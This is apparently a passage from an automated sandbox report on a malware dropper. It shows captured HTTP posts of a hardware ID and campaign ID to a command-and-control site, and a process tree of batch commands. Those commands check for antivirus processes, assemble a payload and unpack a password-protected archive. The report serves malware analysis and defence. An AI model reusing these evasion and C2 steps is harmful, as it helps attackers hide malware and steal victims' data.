                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 7108
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:39 UTC7108OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB995E4D9F52D541FF1A5C98253DBF0B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"BVnUqo--@Mone
                                                              2024-10-30 14:44:40 UTC1007INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:40 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=j9nsmd02sierk6tbvrr21t1ta1; expires=Sun, 23 Feb 2025 08:31:19 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rSnoP31Rc45TdzcnlU8MeQpb5ndQJyU8hAeDYA4tNKKanJeNuj6e01bviakmgBWO0uS0za3TbBIH7lRcSeKUCTiL8%2FlWeNiOe50ytXVDiuaxkKjaqUczeiyHtqe1i00X%2F9Z2"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f45be4f3474-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1229&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2839&recv_bytes=8025&delivery_rate=2113868&cwnd=251&unsent_bytes=0&cid=b952c9553440fd37&ts=498&x=0"
                                                              2024-10-30 14:44:40 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.78
                                                              2024-10-30 14:44:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.649992172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:41 UTC281OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 1225
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:41 UTC1225OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB995E4D9F52D541FF1A5C98253DBF0B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"BVnUqo--@Mone
                                                              2024-10-30 14:44:41 UTC1016INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=en5hkb2c2sfdrfos1851fbh47e; expires=Sun, 23 Feb 2025 08:31:20 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jbrzOvFeC%2FD%2B6JbKp9oHyEt%2B8l%2BbFfoAk8hwU2KVaQNVaL%2BTEUw%2BN2dCnfYp7ZQlAc59n8nauFi4zL0f49eX3qfeGfdvixHvir%2BMwmHKtEofhsEO4W8q6tSZedpJRTowKHcz"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f4d49776c31-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1125&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2142&delivery_rate=2620814&cwnd=251&unsent_bytes=0&cid=067762c2d82b4d1a&ts=474&x=0"
                                                              2024-10-30 14:44:41 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.78
                                                              2024-10-30 14:44:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.649993172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:42 UTC281OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 1141
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:42 UTC1141OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB995E4D9F52D541FF1A5C98253DBF0B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"BVnUqo--@Mone
                                                              2024-10-30 14:44:42 UTC1012INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:42 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=o44g3iqkloebu4bftp6b9r5knk; expires=Sun, 23 Feb 2025 08:31:21 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHurX2SG6BWuRkEG8vw1wV%2FImrbz7ba%2BFR9BRBkwjcNIl667q5ZCrxEwW9XnW3diINz5h%2FXR5NI5y7FJEso3TIejaZ0bPxuJDEa99C%2FcSt5jZbnfVm%2B54Dgxhs1yDq2N0kZE"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f543a4b3474-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1205&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2058&delivery_rate=2205635&cwnd=251&unsent_bytes=0&cid=9bf425c8f09c4fea&ts=472&x=0"
                                                              2024-10-30 14:44:42 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.78
                                                              2024-10-30 14:44:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.649994172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:43 UTC265OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 120
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:43 UTC120OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65 79 50 61 79 4f 50 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33 26 68 77 69 64 3d 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42
                                                              Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@MoneyPayOP&j=7c263357d04aff473cb2eda8a42ff033&hwid=AB995E4D9F52D541FF1A5C98253DBF0B
                                                              2024-10-30 14:44:43 UTC1008INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:43 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=q2m0ovc9tq6f3i3842bs66equv; expires=Sun, 23 Feb 2025 08:31:22 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YiDNhpb8LwGciQRcM1UvRkVF%2FaPllvc8FHOBcxdSYaFESPCM99jQPqlLVnengpxXsI0N8r6E%2BJub8hfrmFfaslWb99jNek%2B85Lt6ucZRPnf32cV479oZnw4uTInKbNkU0jMB"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f5b0d912fd0-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1401&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1021&delivery_rate=2078966&cwnd=251&unsent_bytes=0&cid=b3fd0319bb120076&ts=464&x=0"
                                                              2024-10-30 14:44:43 UTC126INData Raw: 37 38 0d 0a 51 4b 58 4c 46 31 32 71 57 46 37 57 6d 45 57 4f 69 53 4c 35 5a 4f 63 4c 78 66 64 7a 6e 36 44 31 56 72 6f 6d 68 33 6e 6c 6d 34 67 62 33 75 6c 69 66 35 42 36 4e 71 4c 73 4e 62 54 56 44 61 56 4c 31 6a 2f 79 32 55 65 71 6a 73 46 68 6c 42 36 32 4a 63 72 34 35 79 37 4e 70 47 51 70 68 44 30 6d 73 37 70 70 72 4f 39 57 32 31 37 58 4a 2b 65 53 55 61 57 51 69 41 73 3d 0d 0a
                                                              Data Ascii: 78QKXLF12qWF7WmEWOiSL5ZOcLxfdzn6D1Vromh3nlm4gb3ulif5B6NqLsNbTVDaVL1j/y2UeqjsFhlB62Jcr45y7NpGQphD0ms7pprO9W217XJ+eSUaWQiAs=
                                                              2024-10-30 14:44:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:10:42:12
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\Desktop\Set-up.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                              Imagebase:0x400000
                                                              File size:56'623'098 bytes
                                                              MD5 hash:8EA72D1DD14D5A570D5F5A595CFD1D5D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:10:42:15
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat
                                                              Imagebase:0x1c0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:10:42:15
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:10:42:15
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist
                                                              Imagebase:0xac0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:10:42:15
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "wrsa opssvc"
                                                              Imagebase:0x7f0000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:10:42:16
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist
                                                              Imagebase:0xac0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:10:42:16
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                              Imagebase:0x7f0000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:10:42:16
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c md 506033
                                                              Imagebase:0x1c0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:10:42:16
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /V "RubberBrilliantPoliceOperator" Count
                                                              Imagebase:0x7f0000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:10:42:17
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c copy /b ..\Lil + ..\Labeled + ..\Warren + ..\Current + ..\Endless + ..\Towers + ..\Based W
                                                              Imagebase:0x1c0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:10:42:17
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              Wow64 process (32bit):true
                                                              Commandline:Limitations.pif W
                                                              Imagebase:0x590000
                                                              File size:893'608 bytes
                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 5%, ReversingLabs
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:10:42:17
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:choice /d y /t 5
                                                              Imagebase:0xa0000
                                                              File size:28'160 bytes
                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:10:44:45
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe"
                                                              Imagebase:0x400000
                                                              File size:3'125'704 bytes
                                                              MD5 hash:CE901A874C9D157E48F83B1BE3D32AA6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 79%, ReversingLabs
                                                              Has exited:false

                                                              Target ID:17
                                                              Start time:10:44:48
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                              Imagebase:0x7ff7916b0000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:18
                                                              Start time:10:44:48
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:19
                                                              Start time:10:44:48
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\System32\mode.com
                                                              Wow64 process (32bit):false
                                                              Commandline:mode 65,10
                                                              Imagebase:0x7ff6541b0000
                                                              File size:33'280 bytes
                                                              MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:10:44:48
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              Has exited:true

                                                              Target ID:21
                                                              Start time:10:44:48
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_11.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:10:44:49
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_10.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:10:44:49
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_9.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:10:44:49
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_8.zip -oextracted
                                                              Imagebase:0x7ff6ae840000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:10:44:49
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:10:44:49
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:27
                                                              Start time:10:44:49
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:28
                                                              Start time:10:44:49
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:29
                                                              Start time:10:44:50
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:30
                                                              Start time:10:44:50
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:31
                                                              Start time:10:44:50
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                              Imagebase:0x110000
                                                              File size:468'992 bytes
                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:32
                                                              Start time:10:44:50
                                                              Start date:30/10/2024
                                                              Path:C:\Windows\System32\attrib.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:attrib +H "Installer.exe"
                                                              Imagebase:0x7ff7af0e0000
                                                              File size:23'040 bytes
